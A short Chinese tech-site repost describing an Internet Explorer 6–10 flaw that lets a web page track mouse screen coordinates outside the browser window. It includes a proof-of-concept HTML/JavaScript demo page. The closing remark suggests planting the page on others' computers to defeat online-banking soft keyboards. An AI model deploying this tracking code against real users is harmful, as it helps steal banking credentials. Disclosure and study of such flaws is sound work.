IE浏览器鼠标坐标跟踪安全风险,通杀全版本

发布时间:2020-08-10 21:54:01 作者:perlin
来源:网络 阅读:724

刚在Seclist上又看到了IE漏洞。该漏洞的主要影响是能够跟踪鼠标坐标位置,即使当前鼠标位置位于非浏览器窗口。该漏洞最先被spider.io团队发现。

影响版本:IE6-10

测试:

在系统目录下新建一个html文件,代码如下:

<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8" />
  <title>Exploit Demo</title>
  <script type="text/javascript">
    window.attachEvent("onload", function() {
      var detector = document.getElementById("detector");
      detector.attachEvent("onmousemove", function (e) {
        detector.innerHTML = e.screenX + ", " + e.screenY;
      });
      setInterval(function () {
        detector.fireEvent("onmousemove");
      }, 100);
    });
  </script>
</head>
<body>
  <div id="detector"></div>
</body>
</html>
用IE打开新建的html文件
IE浏览器鼠标坐标跟踪安全风险,通杀全版本
 
试想将该漏洞上传到别人的电脑对方还使用网银,以为软键盘就安全了,测试后发现不以为然。
推荐阅读:
  1. IE浏览器IE8 IE9 IE10完美体验
  2. 企业级风险控制及安全治理防范

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

ie浏览器 鼠标 target

上一篇:云计算开发教程:Python数据类型之数字

下一篇:腾讯算法面试题:64匹马8个跑道需要多少轮才能选出最快的四匹?

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》